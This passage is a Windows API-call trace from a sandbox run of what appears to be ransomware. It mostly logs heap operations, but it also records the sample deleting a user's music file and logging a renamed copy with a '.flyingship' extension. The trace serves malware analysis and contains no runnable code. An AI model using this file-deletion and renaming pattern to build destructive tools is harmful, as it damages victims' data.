hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0184.542] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0184.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.543] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.543] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0184.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.543] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.543] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.545] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.545] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.545] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.545] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.545] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a", lpFilePart=0x0) returned 0x52 [0184.547] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a4a880, ftCreationTime.dwHighDateTime=0x1d5d87d, ftLastAccessTime.dwLowDateTime=0xd95b64b0, ftLastAccessTime.dwHighDateTime=0x1d5df54, ftLastWriteTime.dwLowDateTime=0x133e6100, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1bd9, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="KQpDY.m4a", cAlternateFileName="")) returned 0x90af58 [0184.547] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\kqpdy.m4a")) returned 1 [0184.550] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a4a880, ftCreationTime.dwHighDateTime=0x1d5d87d, ftLastAccessTime.dwLowDateTime=0xd95b64b0, ftLastAccessTime.dwHighDateTime=0x1d5df54, ftLastWriteTime.dwLowDateTime=0x133e6100, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1bd9, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="KQpDY.m4a", cAlternateFileName="")) returned 0 [0184.550] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0184.550] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.550] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.550] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0184.550] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.550] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.551] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.551] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.551] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.552] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0184.552] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.552] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0184.553] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.553] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0184.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0184.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.553] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0184.553] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2162, lpOverlapped=0x0) returned 1 [0184.554] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0184.554] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x2162, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.554] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0184.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0184.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0184.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.flyingship.m4a\r\n", cchWideChar=96, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 96 [0184.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0184.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.flyingship.m4a\r\n", cchWideChar=96, lpMultiByteStr=0x9a5d10, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.flyingship.m4a\r\n", lpUsedDefaultChar=0x0) returned 96 [0184.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0184.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0184.554] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x5f, lpOverlapped=0x0) returned 1 [0184.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0184.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.555] CloseHandle (hObject=0x120) returned 1 [0184.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0184.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0184.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0184.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0184.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0184.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0184.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0184.561] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0184.561] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0184.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0184.562] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0184.562] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.563] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0184.563] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0184.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0184.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0184.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0184.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0184.564] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.564] RtlAllocateHeap 